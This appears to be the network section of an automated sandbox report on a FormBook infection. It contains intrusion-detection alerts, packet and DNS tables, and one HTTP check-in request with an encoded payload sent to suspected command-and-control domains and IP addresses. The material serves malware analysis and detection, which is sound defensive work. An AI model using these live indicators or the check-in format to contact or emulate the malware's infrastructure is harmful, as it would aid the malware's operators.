2025-01-07T10:07:49.046303+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49750	84.32.84.32	80	TCP
2025-01-07T10:07:49.046303+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49749	84.32.84.32	80	TCP
2025-01-07T10:07:49.046303+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49748	84.32.84.32	80	TCP
2025-01-07T10:08:48.943382+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.11.20	49747	47.83.1.90	80	TCP
2025-01-07T10:08:48.943382+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49747	47.83.1.90	80	TCP
2025-01-07T10:09:12.886951+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.11.20	49751	84.32.84.32	80	TCP
2025-01-07T10:09:12.886951+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49751	84.32.84.32	80	TCP
2025-01-07T10:09:18.534153+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49752	104.21.18.171	80	TCP
2025-01-07T10:09:21.180712+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49753	104.21.18.171	80	TCP
2025-01-07T10:09:23.837045+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49754	104.21.18.171	80	TCP
2025-01-07T10:09:26.488958+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.11.20	49755	104.21.18.171	80	TCP
2025-01-07T10:09:26.488958+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49755	104.21.18.171	80	TCP
2025-01-07T10:09:33.089585+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49756	134.122.135.48	80	TCP
2025-01-07T10:09:35.916665+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49757	134.122.135.48	80	TCP
2025-01-07T10:09:38.742411+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49758	134.122.135.48	80	TCP
2025-01-07T10:09:41.563839+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.11.20	49759	134.122.135.48	80	TCP
2025-01-07T10:09:41.563839+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49759	134.122.135.48	80	TCP
2025-01-07T10:09:47.112045+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49760	199.192.21.169	80	TCP
2025-01-07T10:09:49.819982+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49761	199.192.21.169	80	TCP
2025-01-07T10:09:52.724831+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49762	199.192.21.169	80	TCP
2025-01-07T10:09:55.224178+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.11.20	49763	199.192.21.169	80	TCP
2025-01-07T10:09:55.224178+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49763	199.192.21.169	80	TCP
2025-01-07T10:10:01.188487+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49764	154.197.162.239	80	TCP
2025-01-07T10:10:05.000797+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49765	154.197.162.239	80	TCP
2025-01-07T10:10:07.689430+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.11.20	49766	154.197.162.239	80	TCP
2025-01-07T10:10:10.374238+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.11.20	49767	154.197.162.239	80	TCP
2025-01-07T10:10:10.374238+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.11.20	49767	154.197.162.239	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 10:08:47.657654047 CET	49747	80	192.168.11.20	47.83.1.90
Jan 7, 2025 10:08:47.957526922 CET	80	49747	47.83.1.90	192.168.11.20
Jan 7, 2025 10:08:47.957823038 CET	49747	80	192.168.11.20	47.83.1.90
Jan 7, 2025 10:08:47.960297108 CET	49747	80	192.168.11.20	47.83.1.90
Jan 7, 2025 10:08:48.259865046 CET	80	49747	47.83.1.90	192.168.11.20
Jan 7, 2025 10:08:48.942692995 CET	80	49747	47.83.1.90	192.168.11.20
Jan 7, 2025 10:08:48.942708969 CET	80	49747	47.83.1.90	192.168.11.20
Jan 7, 2025 10:08:48.943382025 CET	49747	80	192.168.11.20	47.83.1.90
Jan 7, 2025 10:08:48.945981979 CET	49747	80	192.168.11.20	47.83.1.90
Jan 7, 2025 10:08:49.245681047 CET	80	49747	47.83.1.90	192.168.11.20
Jan 7, 2025 10:09:04.251190901 CET	49748	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:04.459151983 CET	80	49748	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:04.459350109 CET	49748	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:04.463020086 CET	49748	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:04.670922995 CET	80	49748	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:04.671901941 CET	80	49748	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:06.991267920 CET	49749	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:07.199628115 CET	80	49749	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:07.199841022 CET	49749	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:07.203402042 CET	49749	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:07.411720991 CET	80	49749	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:07.412266970 CET	80	49749	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:09.725394011 CET	49750	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:09.934050083 CET	80	49750	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:09.934258938 CET	49750	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:09.938079119 CET	49750	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:09.938138008 CET	49750	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:10.146907091 CET	80	49750	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:10.146951914 CET	80	49750	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:10.146981001 CET	80	49750	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:10.147289991 CET	80	49750	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:12.458784103 CET	49751	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:12.671196938 CET	80	49751	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:12.671449900 CET	49751	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:12.673835039 CET	49751	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:12.886408091 CET	80	49751	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:12.886480093 CET	80	49751	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:12.886653900 CET	80	49751	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:12.886744976 CET	80	49751	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:12.886828899 CET	80	49751	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:12.886944056 CET	80	49751	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:12.886950970 CET	49751	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:12.887006998 CET	49751	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:12.887070894 CET	80	49751	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:12.887178898 CET	80	49751	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:12.887295008 CET	80	49751	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:12.887301922 CET	80	49751	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:12.887413025 CET	49751	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:12.887579918 CET	49751	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:12.888293982 CET	49751	80	192.168.11.20	84.32.84.32
Jan 7, 2025 10:09:13.100712061 CET	80	49751	84.32.84.32	192.168.11.20
Jan 7, 2025 10:09:18.063877106 CET	49752	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:18.182383060 CET	80	49752	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:18.182575941 CET	49752	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:18.186222076 CET	49752	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:18.305089951 CET	80	49752	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:18.533927917 CET	80	49752	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:18.533973932 CET	80	49752	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:18.533999920 CET	80	49752	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:18.534029961 CET	80	49752	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:18.534152985 CET	49752	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:18.534240007 CET	49752	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:19.690735102 CET	49752	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:20.706849098 CET	49753	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:20.826239109 CET	80	49753	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:20.826419115 CET	49753	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:20.830059052 CET	49753	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:20.949281931 CET	80	49753	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:21.180531979 CET	80	49753	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:21.180577040 CET	80	49753	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:21.180604935 CET	80	49753	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:21.180638075 CET	80	49753	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:21.180711985 CET	49753	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:21.180855989 CET	49753	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:22.346270084 CET	49753	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:23.362632036 CET	49754	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:23.481869936 CET	80	49754	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:23.482151985 CET	49754	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:23.485846996 CET	49754	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:23.485896111 CET	49754	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:23.605118990 CET	80	49754	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:23.605422974 CET	80	49754	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:23.605432034 CET	80	49754	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:23.605662107 CET	80	49754	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:23.605748892 CET	80	49754	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:23.605954885 CET	80	49754	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:23.836843967 CET	80	49754	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:23.836857080 CET	80	49754	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:23.837044954 CET	49754	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:23.837408066 CET	80	49754	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:23.837677002 CET	49754	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:25.002401114 CET	49754	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:26.018276930 CET	49755	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:26.137830019 CET	80	49755	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:26.138060093 CET	49755	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:26.140533924 CET	49755	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:26.260063887 CET	80	49755	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:26.488563061 CET	80	49755	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:26.488573074 CET	80	49755	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:26.488957882 CET	49755	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:26.489187002 CET	80	49755	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:26.489387035 CET	49755	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:26.490011930 CET	49755	80	192.168.11.20	104.21.18.171
Jan 7, 2025 10:09:26.610974073 CET	80	49755	104.21.18.171	192.168.11.20
Jan 7, 2025 10:09:32.487575054 CET	49756	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:32.784208059 CET	80	49756	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:32.784353018 CET	49756	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:32.788085938 CET	49756	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:33.084611893 CET	80	49756	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:33.089441061 CET	80	49756	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:33.089456081 CET	80	49756	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:33.089585066 CET	49756	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:34.296884060 CET	49756	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:35.312952995 CET	49757	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:35.610059023 CET	80	49757	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:35.610382080 CET	49757	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:35.614120007 CET	49757	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:35.911187887 CET	80	49757	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:35.916320086 CET	80	49757	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:35.916399956 CET	80	49757	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:35.916665077 CET	49757	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:37.124279022 CET	49757	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:38.140352964 CET	49758	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:38.435636044 CET	80	49758	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:38.435858011 CET	49758	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:38.439614058 CET	49758	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:38.439660072 CET	49758	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:38.439749956 CET	49758	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:38.734596968 CET	80	49758	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:38.734832048 CET	80	49758	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:38.734844923 CET	80	49758	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:38.735124111 CET	80	49758	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:38.735137939 CET	80	49758	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:38.735395908 CET	80	49758	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:38.735409975 CET	80	49758	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:38.742069960 CET	80	49758	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:38.742247105 CET	80	49758	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:38.742410898 CET	49758	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:39.951646090 CET	49758	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:40.967746973 CET	49759	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:41.262042046 CET	80	49759	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:41.262257099 CET	49759	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:41.264713049 CET	49759	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:41.558346987 CET	80	49759	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:41.563539982 CET	80	49759	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:41.563550949 CET	80	49759	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:41.563838959 CET	49759	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:41.564551115 CET	49759	80	192.168.11.20	134.122.135.48
Jan 7, 2025 10:09:41.858319998 CET	80	49759	134.122.135.48	192.168.11.20
Jan 7, 2025 10:09:46.744664907 CET	49760	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:46.917140007 CET	80	49760	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:46.917365074 CET	49760	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:46.921082020 CET	49760	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:47.093449116 CET	80	49760	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:47.111891985 CET	80	49760	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:47.111901999 CET	80	49760	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:47.112045050 CET	49760	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:48.434019089 CET	49760	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:49.450150013 CET	49761	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:49.622672081 CET	80	49761	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:49.622868061 CET	49761	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:49.626602888 CET	49761	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:49.799213886 CET	80	49761	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:49.819799900 CET	80	49761	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:49.819823027 CET	80	49761	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:49.819982052 CET	49761	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:51.136660099 CET	49761	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:52.152720928 CET	49762	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:52.325078011 CET	80	49762	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:52.325309038 CET	49762	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:52.329142094 CET	49762	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:52.329163074 CET	49762	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:52.329247952 CET	49762	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:52.502738953 CET	80	49762	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:52.502753973 CET	80	49762	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:52.503380060 CET	80	49762	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:52.503386974 CET	80	49762	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:52.724545956 CET	80	49762	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:52.724559069 CET	80	49762	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:52.724831104 CET	49762	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:53.838973045 CET	49762	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:54.855137110 CET	49763	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:55.027930021 CET	80	49763	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:55.028117895 CET	49763	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:55.030599117 CET	49763	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:55.203227997 CET	80	49763	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:55.223793983 CET	80	49763	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:55.223808050 CET	80	49763	199.192.21.169	192.168.11.20
Jan 7, 2025 10:09:55.224178076 CET	49763	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:55.224807024 CET	49763	80	192.168.11.20	199.192.21.169
Jan 7, 2025 10:09:55.397511005 CET	80	49763	199.192.21.169	192.168.11.20
Jan 7, 2025 10:10:00.852833986 CET	49764	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:01.017338991 CET	80	49764	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:01.017539024 CET	49764	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:01.021178961 CET	49764	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:01.188165903 CET	80	49764	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:01.188344002 CET	80	49764	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:01.188487053 CET	49764	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:03.649343014 CET	49764	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:04.665534973 CET	49765	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:04.829725027 CET	80	49765	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:04.829888105 CET	49765	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:04.833554029 CET	49765	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:05.000633955 CET	80	49765	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:05.000647068 CET	80	49765	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:05.000797033 CET	49765	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:06.336092949 CET	49765	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:07.352272034 CET	49766	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:07.516518116 CET	80	49766	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:07.516658068 CET	49766	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:07.520858049 CET	49766	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:07.520910978 CET	49766	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:07.685811996 CET	80	49766	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:07.686005116 CET	80	49766	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:07.686254978 CET	80	49766	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:07.689218044 CET	80	49766	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:07.689232111 CET	80	49766	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:07.689429998 CET	49766	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:09.022977114 CET	49766	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:10.039093971 CET	49767	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:10.203411102 CET	80	49767	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:10.203707933 CET	49767	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:10.206197023 CET	49767	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:10.373959064 CET	80	49767	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:10.373974085 CET	80	49767	154.197.162.239	192.168.11.20
Jan 7, 2025 10:10:10.374238014 CET	49767	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:10.374917984 CET	49767	80	192.168.11.20	154.197.162.239
Jan 7, 2025 10:10:10.539036989 CET	80	49767	154.197.162.239	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 10:08:47.469579935 CET	57678	53	192.168.11.20	1.1.1.1
Jan 7, 2025 10:08:47.654439926 CET	53	57678	1.1.1.1	192.168.11.20
Jan 7, 2025 10:09:03.991540909 CET	53691	53	192.168.11.20	1.1.1.1
Jan 7, 2025 10:09:04.250052929 CET	53	53691	1.1.1.1	192.168.11.20
Jan 7, 2025 10:09:17.894814014 CET	62015	53	192.168.11.20	1.1.1.1
Jan 7, 2025 10:09:18.062381983 CET	53	62015	1.1.1.1	192.168.11.20
Jan 7, 2025 10:09:31.500952005 CET	51652	53	192.168.11.20	1.1.1.1
Jan 7, 2025 10:09:32.486304998 CET	53	51652	1.1.1.1	192.168.11.20
Jan 7, 2025 10:09:46.575443029 CET	52603	53	192.168.11.20	1.1.1.1
Jan 7, 2025 10:09:46.743422031 CET	53	52603	1.1.1.1	192.168.11.20
Jan 7, 2025 10:10:00.228591919 CET	49830	53	192.168.11.20	1.1.1.1
Jan 7, 2025 10:10:00.851644039 CET	53	49830	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 10:08:47.469579935 CET	192.168.11.20	1.1.1.1	0x2818	Standard query (0)	www.gayhxi.info	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:03.991540909 CET	192.168.11.20	1.1.1.1	0xf99c	Standard query (0)	www.promocao.info	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:17.894814014 CET	192.168.11.20	1.1.1.1	0x9a53	Standard query (0)	www.grimbo.boats	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:31.500952005 CET	192.168.11.20	1.1.1.1	0x129e	Standard query (0)	www.44756.pizza	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:46.575443029 CET	192.168.11.20	1.1.1.1	0xce7	Standard query (0)	www.lonfor.website	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:10:00.228591919 CET	192.168.11.20	1.1.1.1	0x78a6	Standard query (0)	www.investshares.net	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 10:08:47.654439926 CET	1.1.1.1	192.168.11.20	0x2818	No error (0)	www.gayhxi.info		47.83.1.90	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:04.250052929 CET	1.1.1.1	192.168.11.20	0xf99c	No error (0)	www.promocao.info	promocao.info		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 10:09:04.250052929 CET	1.1.1.1	192.168.11.20	0xf99c	No error (0)	promocao.info		84.32.84.32	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:18.062381983 CET	1.1.1.1	192.168.11.20	0x9a53	No error (0)	www.grimbo.boats		104.21.18.171	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:18.062381983 CET	1.1.1.1	192.168.11.20	0x9a53	No error (0)	www.grimbo.boats		172.67.182.198	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:32.486304998 CET	1.1.1.1	192.168.11.20	0x129e	No error (0)	www.44756.pizza	zcdn.8383dns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 10:09:32.486304998 CET	1.1.1.1	192.168.11.20	0x129e	No error (0)	zcdn.8383dns.com		134.122.135.48	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:32.486304998 CET	1.1.1.1	192.168.11.20	0x129e	No error (0)	zcdn.8383dns.com		134.122.133.80	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:09:46.743422031 CET	1.1.1.1	192.168.11.20	0xce7	No error (0)	www.lonfor.website		199.192.21.169	A (IP address)	IN (0x0001)	false
Jan 7, 2025 10:10:00.851644039 CET	1.1.1.1	192.168.11.20	0x78a6	No error (0)	www.investshares.net		154.197.162.239	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.gayhxi.info

www.promocao.info

www.grimbo.boats

www.44756.pizza

www.lonfor.website

www.investshares.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49747	47.83.1.90	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 7, 2025 10:08:47.960297108 CET	469	OUT	GET /k2i2/?KHKq=K3iyk&KI7UaA4=oYl0YuhK+EfenM8eRymXNBnaKArlDGdWSGf6Q1012MfAC24gU0JLDSHJdRiR078xrhufJIQsd6i55/X9+LeTdG3SQaFYv5Mzf8bAEkK4ob53ijBtuMlH5fk= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Host: www.gayhxi.info Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
Jan 7, 2025 10:08:48.942692995 CET	139	IN	HTTP/1.1 567 unknown Server: nginx/1.18.0 Date: Tue, 07 Jan 2025 09:08:48 GMT Content-Length: 17 Connection: close Data Raw: 52 65 71 75 65 73 74 20 74 6f 6f 20 6c 61 72 67 65 Data Ascii: Request too large

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49748	84.32.84.32	80	7188	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
